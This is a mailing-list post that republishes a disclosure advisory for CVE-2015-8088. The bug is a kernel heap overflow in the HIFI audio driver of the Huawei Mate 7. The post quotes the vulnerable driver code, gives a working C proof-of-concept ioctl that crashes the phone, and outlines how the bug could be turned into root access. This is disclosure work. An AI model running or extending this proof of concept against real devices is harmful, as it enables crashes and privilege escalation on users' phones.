Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <etPan.566c348a.736a8748.22f4@s3cur1ty-lab.local>
Date: Sat, 12 Dec 2015 22:51:54 +0800
From: Pray3r <pray3r.z@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE-2015-8088: Heap Overflow Vulnerability in the HIFI Driver
 of Huawei Smart Phone

Hello everyone,
	One month ago, I was reported heap overflow vulnerability of Huawei smart phone(CVE-2015-8088) to Huawei PSIRT, but they didn’t disclosure the detail of this vulnerability. So I’m sending the original version of the vulnerability advisory to sos-sec mailing list just for record[1].
		
[1]. https://github.com/citypw/DNFWAH/raw/master/5/d5_0x03_DNFWAH_cve-2015-8088-heap-overflow-analysis.txt


|=-----------------------------------------------------------------=|
|=-----=[ D O   N O T   F U C K   W I T H   A   H A C K E R ]=-----=|
|=-----------------------------------------------------------------=|
|=------------------------[ #5 File 0x03 ]-------------------------=|
|=-----------------------------------------------------------------=|
|=-------=[ CVE-2015-8088: Heap Overflow Vulnerability ]=----------=|  
|=--------=[ in the HIFI Driver of Huawei Smart Phone ]=-----------=|
|=-----------------------------------------------------------------=|
|=-----------------------=[ By Pray3r   ]=-------------------------=|
|=-----------------------------------------------------------------=|
|=-----------------------------------------------------------------=|
|=-----------------------=[ Dec 9 2015 ]=--------------------------=|
|=-----------------------------------------------------------------=|


--[ Content

 0x00. Summary

 0x01. Description

 0x02. Impact

 0x03. Affected

 0x04. Patch

 0x05. Timeline


--[ 0x00. Summary

  /dev/hifi_misc module of Huawei Mate 7 smart phone has an input
  check error, which allows the user-mode application to modify
  kernel-mode memory data and maybe make system break down or
  application elevate privilege.


--[ 0x01. Description

  /dev/hifi_misc is an interface for a user-mode application to
interact with kernel module of hisi chipset.  It is very likely that
hifi_misc is related with hifi audio features.  Seen from
drivers/hisi/hifidsp/hifi_lpp.c, one could send messages to hifi's
kernel module by invoking ioctl() with HIFI_MISC_IOCTL_WRITE_PARAMS:

< drivers/hisi/hifidsp/hifi_lpp.c >

static long hifi_misc_ioctl(struct file *fd, unsigned int cmd, unsigned long arg)
{
[...]
	switch(cmd) {
		[...]
		case HIFI_MISC_IOCTL_WRITE_PARAMS : /* write algo param to hifi*/
			ret = hifi_dsp_write_param(arg);
			break;
		[...]
	}
[...]
}

< / >

  After ioctl(), hifi_dsp_write_param() is called with the parameter
  directly passed from user-space:

< drivers/hisi/hifidsp/hifi_lpp.c >

int hifi_dsp_write_param(unsigned long arg)
{
	int ret = OK;
	phys_addr_t hifi_param_phy_addr = 0;
	void*	    			hifi_param_vir_addr = NULL;
	CARM_HIFI_DYN_ADDR_SHARE_STRU* hifi_addr = NULL;
	struct misc_io_sync_param para;
[...]
	if (copy_from_user(&para, (void*)arg, sizeof(struct misc_io_sync_param))) {  // arg --> para
	   loge("copy_from_user fail.\n");
	   ret = ERROR;
	   goto error1;
	}
[...]
	hifi_param_vir_addr = (unsigned char*)ioremap(hifi_param_phy_addr, SIZE_PARAM_PRIV); // heap alloc
	if (NULL == hifi_param_vir_addr) {
	   loge("hifi_param_vir_addr ioremap fail\n");
	   ret = ERROR;
	   goto error2;
	}
[...]
	ret = copy_from_user(hifi_param_vir_addr, para.para_in, para.para_size_in); // heap overflow
	if ( ret != 0) {
	   loge("copy data to hifi error! ret = %d", ret);
	   }
[...]
}

< / >

  Parameter arg is a struct pointer points to user-space memory.
  After initialization of hifi_dsp_write_param(), user-space memory
  pointed by arg is copied to para via copy_from_user().  Without any
  verification, all the member variables of para is fully controlled
  by user-space application.  The struct of para:

struct misc_io_sync_param {
       void *              para_in;           
       unsigned int        para_size_in;       
       void *              para_out;           
       unsigned int        para_size_out;   
};

Next, a memory copy is invoked as copy_from_user(hifi_param_vir_addr,
  para.para_in, para.para_size_in)
  
 1. hifi_param_vir_addr points to a kernel heap block allocated by
    ioremap(), regarded as the address of destination memory block.
    The size of the this heap block is SIZE_PARAM_PRIV (equals to 200
    * 1024) bytes.
  
 2. para.para_in is a pointer controlled by user-space, regarded as
 the address of original memory block.

 3. para.para_size is an unsigned int controlled by user-space,
 regarded as the size of original memory block.
        
  Since there are not any verification of para_size and para_in, if
  para.para_size is larger than 200*1024, say 300*1024, a typical heap
  overflow is triggered.  The source code of our poc:

< poc.c >
/*
 *
 *  HuaWei Mate7 hifi driver Poc
 *
 *  Writen by pray3r<pray3r.z@...il.com>
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>

#define HIFI_MISC_IOCTL_WRITE_PARAMS    _IOWR('A', 0x75, struct misc_io_sync_param)

struct misc_io_sync_param {
       void *                  para_in;            
       unsigned int            para_size_in;        
       void *                  para_out;            
       unsigned int            para_size_out;    
};

int main(int arg, char **argv)
{
	int fd;  
	void *in = malloc(300 * 1024);
	void *out = malloc(100);
	struct misc_io_sync_param poc;

	poc.para_in = in;
	poc.para_size_in = 300 * 1024;
	poc.para_out = out;
	poc.para_size_out = 100;

	fd = open("/dev/hifi_misc", O_RDWR);

	ioctl(fd, HIFI_MISC_IOCTL_WRITE_PARAMS, &poc);

	free(in);
	free(out);

	return 0;
}

< / >

  Execute the crash_poc will break down Huawei Mate 7.  Be aware that
  the poc should be executed under system or audio privilege, since
  /dev/hifi_misc is only writable to audio and system user.


--[ 0x02. Impact  

  First, with a large value set to para.para_size, the smart phone
  will break down because of heap overflow inside kernel space.
  Second, this vulnerability could be used as a kernel information
  disclosure if para.para_in points to kernel objects and the exploit
  is wrapped with heap fengshui technique.  Third, sophisticated
  exploitation methodology such as heap spray of thread_info published
  by Keen Team, an attacker could build a workable exploit gaining the
  root privilege of the smart phone.
  
  Although /dev/hifi_misc is only writable to audio and system user,
  an attacker may approach the root privilege by first gaining audio
  or system privilege via other bugs or tricks then exploit this
  kernel vulnerability to gain root.

  Such two step exploitation methodology to gain root privilege of
  Huawei Mate 7 is something that Keen Team had utilized before:
  
  1. http://www1.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-414174.htm

  2. http://forum.xda-developers.com/mate-7/general/wip-mate-7-root-bl-unlock-t2995086


--[ 0x03. Affected

  Model   : HUAWEI MT7-TL10
  Version : MT7-TL10V100R001CHNC00B133
  Android : 4.4.2
  Kernel  : 3.10.30-00015-g049a08f

  Other models of Huawei smart phones with hisi chipset may also be
  affected.


--[ 0x04. Patch

  More information:
  http://www1.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-460347.htm


--[ 0x05. Timeline

 Sep 28 2015 - Report sent to Huawei PSIRT
 Sep 10 2015 - Huawei confirmed the security issues
 Nov 04 2015 - Huawei fixed and public the security issues
 Nov 09 2015 - Update CVE number

--- 
Security is a bitch!
Content of type "text/html" skipped

Download attachment "signature.asc" of type "application/pgp-signature" (837 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.